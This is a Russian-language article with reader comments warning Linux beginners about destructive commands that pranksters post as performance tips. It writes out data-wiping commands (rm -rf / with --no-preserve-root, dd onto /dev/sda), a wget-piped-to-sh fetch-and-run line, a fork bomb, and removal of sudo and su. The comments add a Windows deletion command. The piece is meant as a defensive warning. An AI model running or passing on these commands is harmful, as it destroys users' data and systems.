Опасные шутки с Linux: какие команды нельзя вводить никогда
Линуксоиды — народ веселый. Мы любим пошутить. К сожалению, некоторые шутки над новичками в Linux иногда заканчиваются уничтожением системы и потерпевшему уже не до смеха. Как не попасться на вредоносный розыгрыш?
Какова принципиальная схема розыгрыша? Начинающий пользователь читает на форуме совет из серии «Как ускорить Linux ровно в 100 раз». В теле комментария содержатся непонятные строчки, которые нужно вписать в терминале. Пользователь копипастит рецепт и его компьютер подрывается на мине. Но что же делать, если ускорить Linux в 100 раз хочется, а потерять данные — нет? Нужно просматривать код на наличие следующих убийственных команд:
mv / /dev/null
Команда переносит содержимое жесткого диска в черную дыру. Эквивалент rm -rf /
rm -rf /
Удаление всего на диске. На самом деле, команда сразу не сработает — сначала задаст пользователю вопрос на английском. Но что делает, скажем, пользователь Linux Mint с вопросами на английском? Жмет «y». Если использовать опцию «--no-preserve-root», то вывод вопроса будет подавлен.
Что на самом деле делает команда «rm -rf /»?
wget http://www.example.com/script.txt -O- | sh
С example.com загрузится и сразу же выполнится код, который вы даже не увидите. Очень опасная команда. На нее ведутся даже некоторые опытные линуксоиды, видя домен, который заслуживает доверия. Но не забывайте, что в некоторых случаях пользователи могут загружать на сайт свои файлы. Безопасное расширение txt тоже не должно обманывать, оно тут не при чем. Содержимое текстового файла будет подано на вход sh.
dd if=/dev/random of=/dev/sda
Уничтожит данные на диске, причем гарантированно без возможности восстановления (при условии, что отработает до конца).
:(){:|:&};:
Вилочная бомба. Опасна только на сервере. Команда порождает копии себя до тех пор, пока не закончится ОЗУ. Затем компьютер виснет, но после перезагрузки полностью работоспособен.
rm -f /usr/bin/sudo ; rm -f /bin/su
Не даст получить права root из терминала. Самая безобидная шутка, но на новичков наводит панику. Опытный линуксоид нажмет Ctrl-Alt-F1, спокойно зайдет под root и восстановит sudo и su.
Получаем права администратора без знания root-пароля
dd if=/dev/random of=/dev/port
Запись мусора в порты ввода-вывода. Вызовет панику ядра и зависание. Некоторые пользователи утверждают, что таким образом можно вызвать аппаратную поломку, однако документальных подтверждений этому нет.
echo 1 > /proc/sys/kernel/panic
Корректный вызов паники ядра Linux.
> /dev/sda
Любые комбинации с этой командой критически опасны. echo "Hello!" > /dev/sda испортит разметку диска. Большие фрагменты мусора, отправляемые в /dev/sda уничтожат данные на диске без возможности восстановления специализированными программами.
Комментарии
Чингачгук
27 августа, 2016 - 16:47
"echo 1 > /proc/sys/kernel/panic"
это не вызовет kernelpanic, а подождет 1 сек до ребута при kernelpanic
Чингачгук
27 августа, 2016 - 16:57
так можно повесить линух и то только от рута, c sudo не сработает
Чингачгук
27 августа, 2016 - 19:06
:(){:|:&};:
-bash: syntax error near unexpected token `{:'
Что я делаю не так?
Чингачгук
27 августа, 2016 - 20:21
вот тот же самый рабочий пример из вики, 2 раза систему положил, видимо пробелов не хватало
насчет kernelpanic там еще одного вызова не хватает
было приятно положить систему во время опытов, многие советы хацкеров 5-2 летней давности уже не пашут. Я кернелпаник уже года 4 не видел
Чингачгук
28 августа, 2016 - 11:30
Интересно, а можно так же угробить Виндовс?
Чингачгук
28 августа, 2016 - 13:30
Сидеть из под админа, не ставить обновления безопасности, ставить кряки на софт и систему.
Делают 90% виндузятников.
Чингачгук
28 августа, 2016 - 13:48
Это понятно, имелось ввиду из командной строки.
Чингачгук
28 августа, 2016 - 14:29
cmd от админа:
del C:\Windows\System32
Чингачгук
28 августа, 2016 - 15:04
а это работает? А то иногда когда переустанавливаю систему чтобы не форматировать диск надо старый windows удалить (другие папки просто нужны на диске). Windows же защищала свои файлы от удаления?
Чингачгук
28 августа, 2016 - 16:29
Достаточно отключить отключаемые службы, почистить планировщик и поковырять gpedit.msc — после этого в Вантузу почти невозможно работать.
Чингачгук
28 августа, 2016 - 19:55
Главное здесь — как раз: поменьше знать (!) Linux!
Чингачгук
28 августа, 2016 - 20:39
? странный вывод. В смысле если не замечать некоторых вещей, то их как-будто нет? :) И потом незнание не освобождает от...
Чингачгук
30 августа, 2016 - 16:58
Написано: "здесь", я понимаю, относительно использования ЭТИХ конамд.
Чингачгук
28 августа, 2016 - 23:33
Имею как минимум по 2 резервных копии рабочих систем Linux,хотя описанной сдесь фигней не занимаюсь :)
Чингачгук
29 августа, 2016 - 10:18
Что значит фигней :). Предупрежден значит вооружен. Если знаешь где может быть проблема, не станешь делать многие ошибки. Или если сделал не будешь смотреть на систему как баран на новые ворота или сразу накатывать резервную копию, а может еще просто что-то исправишь. Постоянное расширение своих знаний — вот что отличает специалиста от лузера
Чингачгук
9 сентября, 2016 - 11:48
Потестил
rm -f /usr/bin/sudo ; rm -f /bin/su
Смог вернуть скопировав с ливсиди файлы sudo и su.
А как это сделать прямо из системы я хз
Чингачгук
13 сентября, 2016 - 14:29
Если установлен пароль рута, ивы можете зайти в него с первого терминала, то скорее всего
# apt-get -y install sudo
# apt-get -y install su
Но опять-же только если вы можете зайти в консоль рутом. Например, если у вас Ubuntu и пароля рута по умолчанию нет, то ничего не получится...
Чингачгук
5 октября, 2016 - 02:29
user@debian:~$ apt-cache search ^sudo$Наверное su как-то по-другому восстанавливается. :)sudo-ldap — Provide limited super user privileges to specific users
sudo — предоставляет ограниченные привилегии суперпользователя указанному пользователю
user@debian:~$ apt-cache search ^su$
user@debian:~$ _
Чингачгук
5 октября, 2016 - 02:19
Я когда-то попробовал
mv file /dev/nullто-ли на центосе то-ли на опенсусе. Думал файл удалится. Но файл заменил собой устройство null. Пришлось судорожно гуглить как его (null) востановить, пока очень удалённый и очень критичный сервер не перезагрузился, т. к. писали, что без него может не загрузиться.Чингачгук
23 ноября, 2016 - 18:47
(c) linux.org.ru
Эх, были времена =))
bpalij
6 марта, 2018 - 11:50
Как в рут зайти под ктрл+альт+ф.. зайти? в тупую вписать логин root и пароль не получалось вроде
pomodor
6 марта, 2018 - 12:04
Это что такое? Если нужен root, то проще воспользоваться командой su. Сначала sudo passwd, а потом su.
Комментировать